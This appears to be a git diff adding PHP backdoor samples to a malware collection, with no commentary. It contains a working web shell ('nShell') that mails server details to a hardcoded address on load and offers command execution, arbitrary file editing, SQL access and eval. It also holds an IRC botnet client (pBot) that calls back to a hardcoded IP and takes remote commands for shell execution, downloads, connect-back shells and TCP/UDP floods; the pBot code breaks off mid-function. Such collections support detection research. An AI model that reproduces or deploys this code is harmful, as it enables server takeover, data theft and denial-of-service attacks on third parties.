BACKGROUND-COLOR: #e4e0d8;
|
||||||
|
width: 30%;
|
||||||
|
}
|
||||||
|
textarea {
|
||||||
|
BORDER-RIGHT: #ffffff 1px solid;
|
||||||
|
BORDER-TOP: #999999 1px solid;
|
||||||
|
BORDER-LEFT: #999999 1px solid;
|
||||||
|
BORDER-BOTTOM: #ffffff 1px solid;
|
||||||
|
BACKGROUND-COLOR: #444444;
|
||||||
|
font: Fixedsys bold;
|
||||||
|
}
|
||||||
|
BODY {
|
||||||
|
margin-top: 1px;
|
||||||
|
margin-right: 1px;
|
||||||
|
margin-bottom: 1px;
|
||||||
|
margin-left: 1px;
|
||||||
|
}
|
||||||
|
table {
|
||||||
|
BORDER-RIGHT: :#444444 1px outset;
|
||||||
|
BORDER-TOP: :#444444 1px outset;
|
||||||
|
BORDER-LEFT: :#444444 1px outset;
|
||||||
|
BORDER-BOTTOM: :#444444 1px outset;
|
||||||
|
BACKGROUND-COLOR: #D4D0C8;
|
||||||
|
}
|
||||||
|
td {
|
||||||
|
BORDER-RIGHT: #aaaaaa 1px solid;
|
||||||
|
BORDER-TOP: :#444444 1px solid;
|
||||||
|
BORDER-LEFT: :#444444 1px solid;
|
||||||
|
BORDER-BOTTOM: #aaaaaa 1px solid;
|
||||||
|
}
|
||||||
|
div,td,table {
|
||||||
|
font-family:Georgia;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body bgcolor=":#444444">
|
||||||
|
<center>
|
||||||
|
<?php
|
||||||
|
error_reporting(0);
|
||||||
|
$function=passthru; // system, exec, cmd
|
||||||
|
$myname=$_SERVER['SCRIPT_NAME'];
|
||||||
|
echo "<b><font color=\"#000000\" size=\"3\" face=\"Georgia\"> System information: :</font><br>"; $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
|
||||||
|
?>
|
||||||
|
<table width="80%" border="0">
|
||||||
|
<td colspan="3" align="center">
|
||||||
|
<?php
|
||||||
|
function ex($comd)
|
||||||
|
{
|
||||||
|
$res = '';
|
||||||
|
if(function_exists("system"))
|
||||||
|
{
|
||||||
|
ob_start();
|
||||||
|
system($comd);
|
||||||
|
$res=ob_get_contents();
|
||||||
|
ob_end_clean();
|
||||||
|
}elseif(function_exists("passthru"))
|
||||||
|
{
|
||||||
|
ob_start();
|
||||||
|
passthru($comd);
|
||||||
|
$res=ob_get_contents();
|
||||||
|
ob_end_clean();
|
||||||
|
}elseif(function_exists("exec"))
|
||||||
|
{
|
||||||
|
exec($comd,$res);
|
||||||
|
$res=implode("\n",$res);
|
||||||
|
}elseif(function_exists("shell_exec"))
|
||||||
|
{
|
||||||
|
$res=shell_exec($comd);
|
||||||
|
}elseif(is_resource($f=popen($comd,"r"))){
|
||||||
|
$res = "";
|
||||||
|
while(!feof($f)) { $res.=fread($f,1024); }
|
||||||
|
pclose($f);
|
||||||
|
}
|
||||||
|
return $res;
|
||||||
|
}
|
||||||
|
|
||||||
|
// safe mod
|
||||||
|
$safe_mode=@ini_get('safe_mode');
|
||||||
|
echo (($safe_mode)?("<div>Safe_mode: <b><font color=green>ON</font></b>"):("Safe_mode: <b><font color=red>OFF</font></b>"));
|
||||||
|
echo " ";
|
||||||
|
// phpversion
|
||||||
|
echo "Php version<font color=\"green\"> : ".@phpversion()."</font>";
|
||||||
|
echo " ";
|
||||||
|
// curl
|
||||||
|
$curl_on = @function_exists('curl_version');
|
||||||
|
echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
|
||||||
|
echo " ";
|
||||||
|
// mysql
|
||||||
|
echo "MYSQL: <b>";
|
||||||
|
$mysql_on = @function_exists('mysql_connect');
|
||||||
|
if($mysql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
|
||||||
|
echo " ";
|
||||||
|
// msssql
|
||||||
|
echo "MSSQL: <b>";
|
||||||
|
$mssql_on = @function_exists('mssql_connect');
|
||||||
|
if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
|
||||||
|
echo " ";
|
||||||
|
// PostgreSQL
|
||||||
|
echo "PostgreSQL: <b>";
|
||||||
|
$pg_on = @function_exists('pg_connect');
|
||||||
|
if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
|
||||||
|
echo " ";
|
||||||
|
// Oracle
|
||||||
|
echo "Oracle: <b>";
|
||||||
|
$ora_on = @function_exists('ocilogon');
|
||||||
|
if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
|
||||||
|
echo "<br>";
|
||||||
|
echo " ";
|
||||||
|
// Disable function
|
||||||
|
echo "Disable functions : <b>";
|
||||||
|
$df=@ini_get('disable_functions');
|
||||||
|
if(!$df){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
|
||||||
|
echo " ";
|
||||||
|
//==============xac dinh os==================
|
||||||
|
$servsoft = $_SERVER['SERVER_SOFTWARE'];
|
||||||
|
if (ereg("Win32", $servsoft)){
|
||||||
|
$sertype = "win";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$sertype = "nix";
|
||||||
|
}
|
||||||
|
//=========================================
|
||||||
|
|
||||||
|
$uname=ex('uname -a');
|
||||||
|
echo "<br>OS: </b><font color=blue>";
|
||||||
|
if (empty($uname)){
|
||||||
|
echo (php_uname()."</font><br><b>");
|
||||||
|
}else
|
||||||
|
echo $uname."</font><br><b>";
|
||||||
|
$id = ex('id');
|
||||||
|
$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
|
||||||
|
echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
|
||||||
|
echo "id: </b><font color=blue>";
|
||||||
|
if (!empty($id)){
|
||||||
|
echo $id."</font><br><b>";
|
||||||
|
}else
|
||||||
|
echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
|
||||||
|
"</font><br><b>";
|
||||||
|
echo "<font color=\"black\"><a href=".$_SERVER['PHP_SELF']."?act=info target=_blank>Php Info</a></font><br></div>";
|
||||||
|
|
||||||
|
?>
|
||||||
|
</td><tr>
|
||||||
|
<td width="20%" align="center"><a href="<?=$myname?>?act=manager"> File Manager</a></td>
|
||||||
|
<td width="20%" align="center"><a href="<?=$myname?>?act=sql">Sql Query</a></td>
|
||||||
|
<td width="20%" align="center"><a href="<?=$myname?>?act=eval">Eval()</a></td><tr>
|
||||||
|
<td colspan="3" >
|
||||||
|
<?php
|
||||||
|
$act=@$_GET['act'];
|
||||||
|
if($act=="info"){
|
||||||
|
echo "<center><font color=red size=10> Php Version :".phpversion()."</font>";
|
||||||
|
phpinfo();
|
||||||
|
echo "</center>";
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
<?php
|
||||||
|
//=========================================================
|
||||||
|
function perms($mode)
|
||||||
|
{
|
||||||
|
if( $mode & 0x1000 ) { $type='p'; }
|
||||||
|
else if( $mode & 0x2000 ) { $type='c'; }
|
||||||
|
else if( $mode & 0x4000 ) { $type='d'; }
|
||||||
|
else if( $mode & 0x6000 ) { $type='b'; }
|
||||||
|
else if( $mode & 0x8000 ) { $type='-'; }
|
||||||
|
else if( $mode & 0xA000 ) { $type='l'; }
|
||||||
|
else if( $mode & 0xC000 ) { $type='s'; }
|
||||||
|
else $type='u';
|
||||||
|
$owner["read"] = ($mode & 00400) ? 'r' : '-';
|
||||||
|
$owner["write"] = ($mode & 00200) ? 'w' : '-';
|
||||||
|
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
|
||||||
|
$group["read"] = ($mode & 00040) ? 'r' : '-';
|
||||||
|
$group["write"] = ($mode & 00020) ? 'w' : '-';
|
||||||
|
$group["execute"] = ($mode & 00010) ? 'x' : '-';
|
||||||
|
$world["read"] = ($mode & 00004) ? 'r' : '-';
|
||||||
|
$world["write"] = ($mode & 00002) ? 'w' : '-';
|
||||||
|
$world["execute"] = ($mode & 00001) ? 'x' : '-';
|
||||||
|
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
|
||||||
|
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
|
||||||
|
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
|
||||||
|
$s=sprintf("%1s", $type);
|
||||||
|
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
|
||||||
|
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
|
||||||
|
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
|
||||||
|
return trim($s);
|
||||||
|
}
|
||||||
|
//===================Delect File=============================
|
||||||
|
$del=$_GET['del'];
|
||||||
|
function delfile($name)
|
||||||
|
{
|
||||||
|
passthru("del ".$name);
|
||||||
|
}
|
||||||
|
function deldir($name)
|
||||||
|
{
|
||||||
|
passthru("rmdir ".$name);
|
||||||
|
}
|
||||||
|
if($del)
|
||||||
|
{
|
||||||
|
if(is_file($del)) delfile($del); else deldir($del);
|
||||||
|
}
|
||||||
|
//==================Quan li thu muc ==========================
|
||||||
|
if($act=="manager"){
|
||||||
|
$arr = array();
|
||||||
|
$arr = array_merge($arr, glob("*"));
|
||||||
|
$arr = array_merge($arr, glob(".*"));
|
||||||
|
$arr = array_merge($arr, glob("*.*"));
|
||||||
|
$arr = array_unique($arr);
|
||||||
|
sort($arr);
|
||||||
|
echo "<table width=100%><tr><td align=center><b>Name</td><td align=center><b>Type</td><td align=center><b>Size</td><td align=center><b>Perms</td><td align=center>Delete</td></tr>";
|
||||||
|
foreach ($arr as $filename) {
|
||||||
|
if ($filename != "." and $filename != ".."){
|
||||||
|
if (is_dir($filename) == true){
|
||||||
|
$directory = "";
|
||||||
|
$dc=str_replace("\\","",dirname($_SERVER['PHP_SELF']));
|
||||||
|
$directory = $directory . "<tr><td align=center>$filename</td><td align=center>" .ucwords(filetype($filename)) . "</td><td></td><td align=center>" . perms(fileperms($filename))."<td align=center><a href=".$_SERVER['PHP_SELF']."?act=manager&del=".$dc.">Del</td>";
|
||||||
|
$dires = $dires . $directory;
|
||||||
|
}
|
||||||
|
if (is_file($filename) == true){
|
||||||
|
$file = "";
|
||||||
|
$link=str_replace(basename($_SERVER['REDIRECT_URL']),$filename,$_SERVER['REDIRECT_URL']);
|
||||||
|
$file = $file . "<tr><td><a href=".$link ." target=_blank>$filename</a></td><td>" .ucwords(filetype($filename)). "</td><td>" . filesize($filename) . "</td><td>" . perms(fileperms($filename))."<td><a href=".$_SERVER['PHP_SELF']."?act=manager&del=".$filename.">Del <a href=".$_SERVER['PHP_SELF']."?act=manager&file=".$filename.">Edit</a></td>";
|
||||||
|
$files = $files . $file;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
echo $dires;
|
||||||
|
echo $files;
|
||||||
|
echo "</table><br>";
|
||||||
|
}
|
||||||
|
// view file ex: /etc/passwd
|
||||||
|
if(isset($_REQUEST['file']))
|
||||||
|
{
|
||||||
|
$file=@$_REQUEST["file"];
|
||||||
|
echo "<b>File :</b><font color=red> ". $file."</font>";
|
||||||
|
$fp=fopen($file,"r+") or die("Ban khong co quyen de ghi vao File nay , hoac do khong tim thay File");
|
||||||
|
$src=@fread($fp,filesize($file));
|
||||||
|
echo "<center><hr color=777777 width=100% height=115px><form action=".$_SERVER['REQUEST_URI']." method=post><TEXTAREA NAME=\"addtxt\" ROWS=\"5\" COLS=\"80\">".htmlspecialchars(stripslashes($src))."</TEXTAREA><br><input type=submit value=Save></form><hr color=777777 width=100% height=115px>";
|
||||||
|
$addtxt=@$_POST["addtxt"];
|
||||||
|
rewind($fp);
|
||||||
|
if($addtxt=="") @fwrite($fp,stripslashes($src)); else $rs=@fwrite($fp,stripslashes($addtxt));
|
||||||
|
if($rs==true)
|
||||||
|
{
|
||||||
|
echo "Noi dung cua file nay da duoc sua doi !<a href=".$_SERVER['REQUEST_URI'].">Xem lai</a>";
|
||||||
|
}
|
||||||
|
ftruncate($fp,ftell($fp));
|
||||||
|
echo "</center>";
|
||||||
|
}
|
||||||
|
|
||||||
|
?>
|
||||||
|
|
||||||
|
<?php
|
||||||
|
// function
|
||||||
|
function exe_u($query)
|
||||||
|
{
|
||||||
|
echo "<B><font color=green>Query # ".$query."</font></b><br>";
|
||||||
|
$result=@mysql_query($query) or die("Khong update du lieu duoc !");
|
||||||
|
if(mysql_affected_rows($result)>=0) echo "Affected rows : ".mysql_affected_rows($result)."This is Ok ! ^.^<br>";
|
||||||
|
}
|
||||||
|
function exe_c($query)
|
||||||
|
{
|
||||||
|
echo "<B><font color=green>Query # ".$query."</font></b><br>";
|
||||||
|
$result=@mysql_query($query) or die("Khong Create duoc !");
|
||||||
|
echo "This is Ok ! ^.^<br>" ;
|
||||||
|
}
|
||||||
|
function exe_d($query)
|
||||||
|
{
|
||||||
|
echo "<B><font color=green>Query # ".$query."</font></b><br>";
|
||||||
|
$result=@mysql_query($query) or die("Khong Drop duoc !");
|
||||||
|
echo "This is Ok ! ^.^<br>" ;
|
||||||
|
}
|
||||||
|
function exe_w($query)
|
||||||
|
{
|
||||||
|
echo "<b><font color=green>Query # ".$query."</font></b><br>";
|
||||||
|
$result=@mysql_query($query) or die("Khong the show gi duoc het !");
|
||||||
|
if(eregi("fields",$query)) {
|
||||||
|
while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){
|
||||||
|
echo "<b><font color=red>".$row['Field']." :</font></ b> ".$row['Type'];
|
||||||
|
echo "<br>";
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){
|
||||||
|
while(list($key,$value)=each($row))
|
||||||
|
{
|
||||||
|
echo "<font color=red><b>".$value."</b><font>";
|
||||||
|
}
|
||||||
|
echo "<br>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
function exe_s($query)
|
||||||
|
{
|
||||||
|
$arrstr=@array();$i=0;
|
||||||
|
$arrstr=explode(" ",$query);
|
||||||
|
$find_field=@mysql_query("show fiedls from ".$arrstr['4']);
|
||||||
|
while($find_row=@mysql_fetch_array($find_field,MYSQL_ASSOC)){
|
||||||
|
$i++;
|
||||||
|
$arrstr[$i]=$find_row['Field'];
|
||||||
|
}
|
||||||
|
echo "<B><font color=green>Query # ".$query."</font></b><br>";
|
||||||
|
$result=@mysql_query($query) or die("Khong the select gi duoc het !");
|
||||||
|
$row=@mysql_num_rows($result);
|
||||||
|
}
|
||||||
|
function sql($string)
|
||||||
|
{
|
||||||
|
$arr=@array();
|
||||||
|
$arr=explode(";",$string);
|
||||||
|
for($i=0;$i<=count($arr);$i++)
|
||||||
|
{
|
||||||
|
$check_u=eregi("update",@$arr[$i]); if($check_u==true) exe_u(@$arr[$i]);
|
||||||
|
$check_e=eregi("use",@$arr[$i]); if($check_u==true) exe_u(@$arr[$i]);
|
||||||
|
$check_c=eregi("create",@$arr[$i]); if($check_c==true) exe_c(@$arr[$i]);
|
||||||
|
$check_d=eregi("drop",@$arr[$i]); if($check_d==true) exe_d(@$arr[$i]);
|
||||||
|
$check_w=eregi("show",@$arr[$i]); if($check_w==true) exe_w(@$arr[$i]);
|
||||||
|
$check_s=eregi("select",@$arr[$i]); if($check_s==true) exe_s(@$arr[$i]);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
//=====xong phan function cho sql
|
||||||
|
// Sql query
|
||||||
|
if($act=="sql")
|
||||||
|
{
|
||||||
|
if(isset($_GET['srname'])&&isset($_GET['pass']))
|
||||||
|
{
|
||||||
|
echo $_GET['srname'];
|
||||||
|
if(!isset($_GET['srname'])) $servername=$_GET['srname'];
|
||||||
|
else $servername="localhost";
|
||||||
|
$con=@mysql_connect($servername,$_GET['uname'],$_GET['pass']) or die("Khong the connect duoc !");
|
||||||
|
$form2="<center><form method=post action=".$_SERVER['PHP_SELF']."><TEXTAREA NAME=\"str\" ROWS=\"2\" COLS=\"60\"></TEXTAREA><br><input type=submit name=s2 value=query></form></center>";
|
||||||
|
echo $form2;
|
||||||
|
$str=@$_POST['str'];
|
||||||
|
if(isset($str)) sql($str);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
echo "chao";
|
||||||
|
$form1="<center><form method=GET action='".$_SERVER['PHP_SELF']."'><table width=100% boder=0><td width=100%> User Name : <input type=text name=uname size=20> Server Name :<input name=srname type=text size=22></td><tr><td width=100%> Password :<input type=text name=pass size=20> Port : <input type=text name=port size=20><input type=submit value=login></form></td></form></table><hr color=777777 width=100% height=115px>";
|
||||||
|
echo $form1;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
|
||||||
|
<?php
|
||||||
|
if($act=="eval"){
|
||||||
|
$script=$_POST['script'];
|
||||||
|
if(!$script){
|
||||||
|
echo "<hr color=777777 width=100% height=115px><form action=".$_SERVER['']." method=post><TEXTAREA NAME=\"\" ROWS=\"5\" COLS=\"60\"></TEXTAREA><input type=submit value=Enter></form><hr color=777777 width=100% height=115px>";
|
||||||
|
}else{
|
||||||
|
eval($script);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
</td>
|
||||||
|
</table>
|
||||||
|
|
||||||
|
<font face=Webdings size=6><b>!</b></font><b><font color=\"#000000\" size=\"3\" face=\"Georgia\">nShell v1.0. Code by Navaro.</font><br><b><font color="#000000" face="Georgia">Have Fun ! {^.^} { ~.~} </font></b>
|
||||||
|
</center>
|
||||||
|
</body>
|
||||||
|
|
||||||
|
|
||||||
|
|
2136
PHP/Backdoor.PHP.Nst.e
Normal file
2136
PHP/Backdoor.PHP.Nst.e
Normal file
File diff suppressed because one or more lines are too long
2136
PHP/Backdoor.PHP.Nst.f
Normal file
2136
PHP/Backdoor.PHP.Nst.f
Normal file
File diff suppressed because one or more lines are too long
514
PHP/Backdoor.PHP.Pbot.a
Normal file
514
PHP/Backdoor.PHP.Pbot.a
Normal file
@ -0,0 +1,514 @@
|
|||||||
|
<?
|
||||||
|
|
||||||
|
/*
|
||||||
|
*
|
||||||
|
* #crew@corp. since 2003
|
||||||
|
* edited by: devil__ and MEIAFASE <admin@xdevil.org> <meiafase@pucorp.org>
|
||||||
|
* Friend: LP <fuckerboy@sercret.gov>
|
||||||
|
* COMMANDS:
|
||||||
|
*
|
||||||
|
* .user <password> //login to the bot
|
||||||
|
* .logout //logout of the bot
|
||||||
|
* .die //kill the bot
|
||||||
|
* .restart //restart the bot
|
||||||
|
* .mail <to> <from> <subject> <msg> //send an email
|
||||||
|
* .dns <IP|HOST> //dns lookup
|
||||||
|
* .download <URL> <filename> //download a file
|
||||||
|
* .exec <cmd> // uses exec() //execute a command
|
||||||
|
* .sexec <cmd> // uses shell_exec() //execute a command
|
||||||
|
* .cmd <cmd> // uses popen() //execute a command
|
||||||
|
* .info //get system information
|
||||||
|
* .php <php code> // uses eval() //execute php code
|
||||||
|
* .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
|
||||||
|
* .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
|
||||||
|
* .raw <cmd> //raw IRC command
|
||||||
|
* .rndnick //change nickname
|
||||||
|
* .pscan <host> <port> //port scan
|
||||||
|
* .safe // test safe_mode (dvl)
|
||||||
|
* .inbox <to> // test inbox (dvl)
|
||||||
|
* .conback <ip> <port> // conect back (dvl)
|
||||||
|
* .uname // return shell's uname using a php function (dvl)
|
||||||
|
*
|
||||||
|
*/
|
||||||
|
|
||||||
|
set_time_limit(0);
|
||||||
|
error_reporting(0);
|
||||||
|
echo "ok!";
|
||||||
|
|
||||||
|
class pBot
|
||||||
|
{
|
||||||
|
var $config = array("server"=>"76.76.4.183",
|
||||||
|
"port"=>"55555",
|
||||||
|
"pass"=>"",
|
||||||
|
"prefix"=>"TX",
|
||||||
|
"maxrand"=>"4",
|
||||||
|
"chan"=>"#n3",
|
||||||
|
"chan2"=>"#n3",
|
||||||
|
"key"=>"jimi",
|
||||||
|
"modes"=>"+p",
|
||||||
|
"password"=>"und56",
|
||||||
|
"trigger"=>".",
|
||||||
|
"hostauth"=>"ircos.org" // * for any hostname (remember: /setvhost pucorp.org)
|
||||||
|
);
|
||||||
|
var $users = array();
|
||||||
|
function start()
|
||||||
|
{
|
||||||
|
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
|
||||||
|
$this->start();
|
||||||
|
$ident = $this->config['prefix'];
|
||||||
|
$alph = range("0","9");
|
||||||
|
for($i=0;$i<$this->config['maxrand'];$i++)
|
||||||
|
$ident .= $alph[rand(0,9)];
|
||||||
|
if(strlen($this->config['pass'])>0)
|
||||||
|
$this->send("PASS ".$this->config['pass']);
|
||||||
|
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
|
||||||
|
$this->set_nick();
|
||||||
|
$this->main();
|
||||||
|
}
|
||||||
|
function main()
|
||||||
|
{
|
||||||
|
while(!feof($this->conn))
|
||||||
|
{
|
||||||
|
$this->buf = trim(fgets($this->conn,512));
|
||||||
|
$cmd = explode(" ",$this->buf);
|
||||||
|
if(substr($this->buf,0,6)=="PING :")
|
||||||
|
{
|
||||||
|
$this->send("PONG :".substr($this->buf,6));
|
||||||
|
}
|
||||||
|
if(isset($cmd[1]) && $cmd[1] =="001")
|
||||||
|
{
|
||||||
|
$this->send("MODE ".$this->nick." ".$this->config['modes']);
|
||||||
|
$this->join($this->config['chan'],$this->config['key']);
|
||||||
|
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
|
||||||
|
else { $safemode = "off"; }
|
||||||
|
$uname = php_uname();
|
||||||
|
$this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
|
||||||
|
$this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
|
||||||
|
}
|
||||||
|
if(isset($cmd[1]) && $cmd[1]=="433")
|
||||||
|
{
|
||||||
|
$this->set_nick();
|
||||||
|
}
|
||||||
|
if($this->buf != $old_buf)
|
||||||
|
{
|
||||||
|
$mcmd = array();
|
||||||
|
$msg = substr(strstr($this->buf," :"),2);
|
||||||
|
$msgcmd = explode(" ",$msg);
|
||||||
|
$nick = explode("!",$cmd[0]);
|
||||||
|
$vhost = explode("@",$nick[1]);
|
||||||
|
$vhost = $vhost[1];
|
||||||
|
$nick = substr($nick[0],1);
|
||||||
|
$host = $cmd[0];
|
||||||
|
if($msgcmd[0]==$this->nick)
|
||||||
|
{
|
||||||
|
for($i=0;$i<count($msgcmd);$i++)
|
||||||
|
$mcmd[$i] = $msgcmd[$i+1];
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
for($i=0;$i<count($msgcmd);$i++)
|
||||||
|
$mcmd[$i] = $msgcmd[$i];
|
||||||
|
}
|
||||||
|
if(count($cmd)>2)
|
||||||
|
{
|
||||||
|
switch($cmd[1])
|
||||||
|
{
|
||||||
|
case "QUIT":
|
||||||
|
if($this->is_logged_in($host))
|
||||||
|
{
|
||||||
|
$this->log_out($host);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "PART":
|
||||||
|
if($this->is_logged_in($host))
|
||||||
|
{
|
||||||
|
$this->log_out($host);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "PRIVMSG":
|
||||||
|
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
|
||||||
|
{
|
||||||
|
if(substr($mcmd[0],0,1)==".")
|
||||||
|
{
|
||||||
|
switch(substr($mcmd[0],1))
|
||||||
|
{
|
||||||
|
case "user":
|
||||||
|
if($mcmd[1]==$this->config['password'])
|
||||||
|
{
|
||||||
|
$this->log_in($host);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->notice($this->config['chan'],"[\2Auth\2]: Senha errada $nick idiota!!");
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif($this->is_logged_in($host))
|
||||||
|
{
|
||||||
|
if(substr($mcmd[0],0,1)==".")
|
||||||
|
{
|
||||||
|
switch(substr($mcmd[0],1))
|
||||||
|
{
|
||||||
|
case "restart":
|
||||||
|
$this->send("QUIT :restart commando from $nick");
|
||||||
|
fclose($this->conn);
|
||||||
|
$this->start();
|
||||||
|
break;
|
||||||
|
case "mail": //mail to from subject message
|
||||||
|
if(count($mcmd)>4)
|
||||||
|
{
|
||||||
|
$header = "From: <".$mcmd[2].">";
|
||||||
|
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "safe":
|
||||||
|
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
|
||||||
|
{
|
||||||
|
$safemode = "on";
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$safemode = "off";
|
||||||
|
}
|
||||||
|
$this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
|
||||||
|
break;
|
||||||
|
case "inbox": //teste inbox
|
||||||
|
if(isset($mcmd[1]))
|
||||||
|
{
|
||||||
|
$token = md5(uniqid(rand(), true));
|
||||||
|
$header = "From: <inbox".$token."@xdevil.org>";
|
||||||
|
$a = php_uname();
|
||||||
|
$b = getenv("SERVER_SOFTWARE");
|
||||||
|
$c = gethostbyname($_SERVER["HTTP_HOST"]);
|
||||||
|
if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <admin@xdevil.org>",$header))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "conback":
|
||||||
|
if(count($mcmd)>2)
|
||||||
|
{
|
||||||
|
$this->conback($mcmd[1],$mcmd[2]);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "dns":
|
||||||
|
if(isset($mcmd[1]))
|
||||||
|
{
|
||||||
|
$ip = explode(".",$mcmd[1]);
|
||||||
|
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "info":
|
||||||
|
case "vunl":
|
||||||
|
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
|
||||||
|
else { $safemode = "off"; }
|
||||||
|
$uname = php_uname();
|
||||||
|
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
|
||||||
|
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
|
||||||
|
break;
|
||||||
|
case "bot":
|
||||||
|
$this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; #crew@corp.");
|
||||||
|
break;
|
||||||
|
case "uname":
|
||||||
|
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
|
||||||
|
else { $safemode = "off"; }
|
||||||
|
$uname = php_uname();
|
||||||
|
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
|
||||||
|
break;
|
||||||
|
case "rndnick":
|
||||||
|
$this->set_nick();
|
||||||
|
break;
|
||||||
|
case "raw":
|
||||||
|
$this->send(strstr($msg,$mcmd[1]));
|
||||||
|
break;
|
||||||
|
case "eval":
|
||||||
|
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
|
||||||
|
break;
|
||||||
|
case "sexec":
|
||||||
|
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
|
||||||
|
$exec = shell_exec($command);
|
||||||
|
$ret = explode("\n",$exec);
|
||||||
|
for($i=0;$i<count($ret);$i++)
|
||||||
|
if($ret[$i]!=NULL)
|
||||||
|
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
|
||||||
|
break;
|
||||||
|
|
||||||
|
case "exec":
|
||||||
|
